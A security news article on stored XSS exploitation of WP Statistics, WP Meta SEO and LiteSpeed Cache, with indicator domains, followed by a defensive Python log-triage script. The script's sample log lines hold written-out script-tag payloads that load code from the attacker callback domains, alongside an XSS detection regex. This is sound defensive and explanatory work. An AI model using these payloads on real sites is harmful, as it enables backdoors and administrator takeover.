Attackers are actively exploiting stored cross-site scripting (XSS) vulnerabilities in several WordPress plugins, according to a report from Fastly. The three bugs, CVE-2024-2194, CVE-2023-6961 and CVE-2023-40000, all stem from insufficient input sanitization and output escaping: the plugin stores attacker-controlled input and later renders it without escaping, so injected script runs in the browser of whoever views the affected page.
The first is WP Statistics, versions 14.5 and below (CVE-2024-2194), which is vulnerable to stored XSS through the URL search parameter. An unauthenticated attacker can inject arbitrary script via that parameter; the script is stored and executes whenever a user views the page on which the plugin renders it. Because the plugin reports the most visited pages, the attacker sends the poisoned request repeatedly so that the entry ranks highly and the payload is sure to be displayed.
Second, WP Meta SEO, versions 4.5.12 and older (CVE-2023-6961), is vulnerable to stored XSS through the Referer HTTP header. The attacker requests a page on the target site, typically one that produces a 404 response, with a Referer header carrying a script tag that loads obfuscated JavaScript from a callback domain. The plugin stores the header and renders it on its 404 & Redirects page, so the script executes in the administrator's browser the next time that page is opened.
Third, LiteSpeed Cache for WordPress, versions up to 5.7.0.1 (CVE-2023-40000), is vulnerable to stored XSS via the 'nameservers' and '_msg' parameters. The injected value is stored and later displayed as an admin notice, so an administrator who opens a backend page where the notice appears runs the script unknowingly, inside an authenticated session. The attacker's script therefore acts with the administrator's privileges for whatever follow-on actions it carries.
The JavaScript delivered in all three cases does the same things: it injects PHP backdoors into plugin and theme files, creates new administrator accounts, and adds tracking via Yandex. The backdoor code searches for wp-loads.php files and inserts code into wp-config.php, so the attacker keeps access even after the vulnerable plugin is updated and the original XSS payload is removed.
The activity is linked to more than one threat actor. The domains media.cdnstaticjs[.]com and idc.cloudiync[.]com, among others, host the payloads used against CVE-2024-2194, CVE-2023-6961 and CVE-2023-40000. The exploit attempts arrive from many IP addresses, each sending multiple requests, with a concentration in AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD).
The domains assets.scontentflow[.]com and cache.cloudswiftcdn[.]com are also associated with the campaign; the scripts served from them are built to backdoor the infected site. The published indicators of compromise cover these domains and the source IP addresses observed in the attacks.
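As an added example, not tooling from Fastly or from the article, the following Python script triages combined-format web-server access logs for the three injection vectors described above (the search parameter, the Referer header, and the 'nameservers' and '_msg' parameters) and for the callback domains listed as indicators. It assumes the WordPress search parameter is the core default "s" (the article only says "URL search parameter"), treats the request paths in its sample as illustrative, and runs on constructed log lines. It inspects only the query string and the Referer header, because standard access logs do not record POST bodies; payloads sent in a body need a WAF or full request capture to be seen.

```python
"""Triage combined-format access logs for the three stored-XSS vectors and the
indicator domains from the article.

Added example, not tooling from the Fastly report. Assumptions: the WordPress
search parameter is the core default "s"; request paths in the sample are
illustrative; the log lines are constructed, not real traffic.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Callback domains quoted in the article, un-defanged for matching.
IOC_DOMAINS = {
    "media.cdnstaticjs.com",
    "idc.cloudiync.com",
    "assets.scontentflow.com",
    "cache.cloudswiftcdn.com",
}

# Query parameters the three CVEs abuse -> label attached to the finding.
WATCHED_PARAMS = {
    "s": "CVE-2024-2194 WP Statistics (search parameter, assumed 's')",
    "nameservers": "CVE-2023-40000 LiteSpeed Cache",
    "_msg": "CVE-2023-40000 LiteSpeed Cache",
}
REFERER_LABEL = "CVE-2023-6961 WP Meta SEO (Referer header)"

# Markers of script injection, checked only after URL decoding.
XSS_MARKERS = re.compile(
    r"<\s*script|javascript:|\bon(?:error|load|mouseover)\s*=|<\s*(?:img|svg|iframe)\b", re.I)

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of URL encoding; payloads are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def ioc_hits(text: str) -> set[str]:
    lowered = text.lower().replace("[.]", ".")
    return {d for d in IOC_DOMAINS if d in lowered}


def triage_line(line: str) -> list[dict]:
    """Return one finding per suspicious parameter/header in a single log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    findings = []
    ip, target, status, referer = m["ip"], m["target"], int(m["status"]), m["referer"]

    # 1. Injected query parameters (WP Statistics, LiteSpeed Cache).
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for raw in values:
            payload = fully_decode(raw)
            hits = ioc_hits(payload)
            if XSS_MARKERS.search(payload) or hits:
                findings.append({"ip": ip, "vector": WATCHED_PARAMS[name], "where": name,
                                 "payload": payload, "iocs": sorted(hits), "status": status})

    # 2. Referer header (WP Meta SEO stores it and renders it on the 404 & Redirects page).
    payload = fully_decode(referer)
    hits = ioc_hits(payload)
    if referer != "-" and (XSS_MARKERS.search(payload) or hits):
        findings.append({"ip": ip, "vector": REFERER_LABEL, "where": "Referer",
                         "payload": payload, "iocs": sorted(hits), "status": status})
    return findings


def triage_log(text: str) -> list[dict]:
    return [f for line in text.splitlines() if line.strip() for f in triage_line(line)]


def by_source(findings: list[dict]) -> dict[str, int]:
    """Findings per source IP; the report describes bursts of requests from a few addresses."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample lines (RFC 5737 addresses); request paths are illustrative.
SAMPLE_LOG = """
203.0.113.10 - - [20/May/2024:10:01:02 +0000] "GET /?s=%3Cscript%20src%3D%22https%3A%2F%2Fmedia.cdnstaticjs.com%2Fj.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [20/May/2024:10:03:44 +0000] "GET /no-such-page HTTP/1.1" 404 1024 "<script src=https://idc.cloudiync.com/a.js></script>" "Mozilla/5.0"
198.51.100.7 - - [20/May/2024:10:05:00 +0000] "GET /wp-admin/admin-ajax.php?_msg=%3Cscript%3Eimport(%27https%3A%2F%2Fassets.scontentflow.com%2Fs.js%27)%3C%2Fscript%3E HTTP/1.1" 200 64 "-" "Mozilla/5.0"
192.0.2.55 - - [20/May/2024:10:06:10 +0000] "GET /?s=wordpress+security HTTP/1.1" 200 8192 "https://www.example.com/" "Mozilla/5.0"
203.0.113.10 - - [20/May/2024:10:07:31 +0000] "GET /?s=%253Cscript%2520src%253Dhttps%253A%252F%252Fcache.cloudswiftcdn.com%252Fx.js%253E%253C%252Fscript%253E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    results = triage_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['ip']:<14} {f['vector']:<55} {f['where']:<8} iocs={f['iocs']} {f['payload'][:60]}")
    print(by_source(results))
```

Decoding up to three layers matters: the fifth sample line carries a double-encoded payload that a single unquote would leave as harmless-looking percent sequences. Grouping by source IP reproduces the per-address request bursts the report describes and is the natural input for blocking at the edge.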
In short, the ongoing exploitation of stored XSS bugs in WordPress plugins is a live threat to site integrity, not a theoretical one. Administrators should update WP Statistics, WP Meta SEO and LiteSpeed Cache beyond the vulnerable versions listed above, check their sites for unexpected administrator accounts and for modified plugin, theme and wp-config.php files, and block or alert on the published indicators of compromise.

